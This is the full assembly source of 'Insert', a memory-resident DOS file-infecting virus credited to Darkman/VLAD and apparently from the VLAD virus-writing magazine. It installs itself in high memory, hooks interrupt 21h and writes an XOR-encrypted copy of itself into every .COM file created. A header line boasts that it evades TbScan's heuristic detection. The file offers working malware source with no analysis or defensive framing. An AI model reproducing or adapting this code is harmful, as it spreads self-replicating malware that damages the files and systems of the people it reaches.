; Darkman/VLAD
; Proudly Presents
; I N S E R T
; - No flags with TbScan v 6.30 high heuristic -
psp equ 100h
insert segment
assume cs:insert,ds:insert,es:insert
org 00h ; Origin of COM-file
code:
lea di,psp+crypt ; DI = offset of crypt
call xorcrypt
crypt:
mov ax,6302h ; Insert service
int 21h ; Do it!
cmp ax,bx ; Already resident?
je virusexit ; Equal? Jump to virusexit
push ds ; Save DS at stack
mov ax,ds
dec ax ; Decrease AX
mov ds,ax ; DS = segment of programs MCB
cmp byte ptr ds:[00h],'Z'
jne insexit ; Not last in chain? Jump to insexit
sub word ptr ds:[03h],(02h*(codeend-code)+0fh)/10h
sub word ptr ds:[12h],(02h*(codeend-code)+0fh)/10h
add ax,ds:[03h] ; AX = MCB + size of memory block
inc ax ; AX = first usable MCB segment
pop ds ; Load DS from stack
cld ; Clear direction flag
push es ; Save ES at stack
mov es,ax ; ES = first usable program segment
mov cx,(codeend-code) ; Move 271 bytes
xor di,di ; Clear DI
lea si,psp+code ; SI = offset of code
rep movsb ; Move virus to high memory
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt table
lea di,int21adr ; DI = offset of int21adr
mov si,(21h*04h) ; SI = offset of interrupt 21h
movsw ; Store address of interrupt 21h \
movsw ; in int21adr /
mov word ptr ds:[21h*04h],offset virusint21
mov ds:[21h*04h+02h],es ; Intercept interrupt 21h
pop es ; Load ES from stack
push es ; Save ES at stack
insexit:
pop ds ; Load DS from stack (ES)
virusexit:
mov ax,65535-(restoreend-restore)
mov cx,(restoreend-restore)
mov di,ax ; DI = offset of end of memory
lea si,psp+restore ; SI = offset of restore
rep movsb ; Move restore code to end of memory
jmp ax ; Jump to restore
virusint21 proc near ; Interrupt 21h of Insert
pushf ; Save flags at stack
cmp ah,3ch ; Create a file?
je infectfile ; Equal? Jump to infectfile
cmp ah,5bh ; Create new file?
je infectfile ; Equal? Jump to infectfile
cmp ax,6302h ; Insert service?
je insservice ; Equal? Jump to insservice
popf ; Load flags from stack
jumpfar db 0eah ; Object code of jump far
int21adr dd ? ; Address of interrupt 21h
insservice:
mov bx,ax
popf ; Load flags from stack
iret ; Interrupt return!
infectfile:
call dword ptr cs:int21adr
pushf ; Save flags at stack
jc createerror ; Error? Jump to createerror
push ax ; Save AX at stack
push bx ; Save BX at stack
push di ; Save DI at stack
push es ; Save ES at stack
xchg ax,bx ; Exchange AX with BX
mov ax,1220h ; Get system file table number
int 2fh ; Do it! (multiplex)
push bx ; Save BX at stack
mov ax,1216h ; Get address of system FCB
mov bl,es:[di] ; BL = system file table entry
int 2fh ; Do it! (multiplex)
pop bx ; Load BX from stack
cmp word ptr es:[di+28h],'OC'
jne exterror ; Not equal? Jump to exterror
cmp byte ptr es:[di+2ah],'M'
jne exterror ; Not equal? Jump to exterror
push cx ; Save CX at stack
push dx ; Save DX at stack
push si ; Save SI at stack
push ds ; Save DS at stack
push cs ; Save CS at stack
pop ds ; Load DS from stack
push cs ; Save CS at stack
pop es ; Load ES from stack
in ax,40h ; AX = port 40h
mov cryptvalues,ax ; Store the crypt value
mov cx,(codeend-code) ; Move 271 bytes
lea di,codeend ; DI = offset of codeend
lea si,code ; SI = offset of code
rep movsb ; Move virus to high memory
lea di,codeend+06h ; DI = offset of crypt
call xorcrypt
mov ah,40h ; Write to file
mov cx,(codeend-code) ; Write 271 bytes
lea dx,codeend ; DX = offset of codeend
int 21h ; Do it!
pop ds ; Load DS from stack
pop si ; Load SI from stack
pop dx ; Load DX from stack
pop cx ; Load CX from stack
exterror:
pop es ; Load ES from stack
pop di ; Load DI from stack
pop bx ; Load BX from stack
pop ax ; Load AX from stack
createerror:
popf ; Load flags from stack
retf 02h ; Return far and pop a word!
endp
restore proc near ; Restore code of original program
lea ax,psp+code ; AX = beginning of code
mov di,ax
lea si,psp+codeend ; SI = offset of real code
mov cx,(65535-psp-(restoreend-restore))-(codeend-code)
rep movsb ; Move the real code to the beginning
jmp ax ; Jump to the real code
endp
restoreend:
virusname db ' [Insert]' ; Name of the virus
virusauthor db ' [Darkman/VLAD] ' ; Author of the virus
cryptend:
xorcrypt proc near ; XOR Encrypt/Decrypt
mov cx,(cryptend-crypt)/02h
cryptcode:
xorwordptr db 81h,35h ; xor word ptr [di],0000h \
cryptvalues dw ? ; " " " " /
inc di ; Increase DI
inc di ; Increase DI
loop cryptcode
ret ; Return!
endp
codeend:
int 20h ; Exit to DOS!
insert ends
end code
- VLAD #3 INDEX -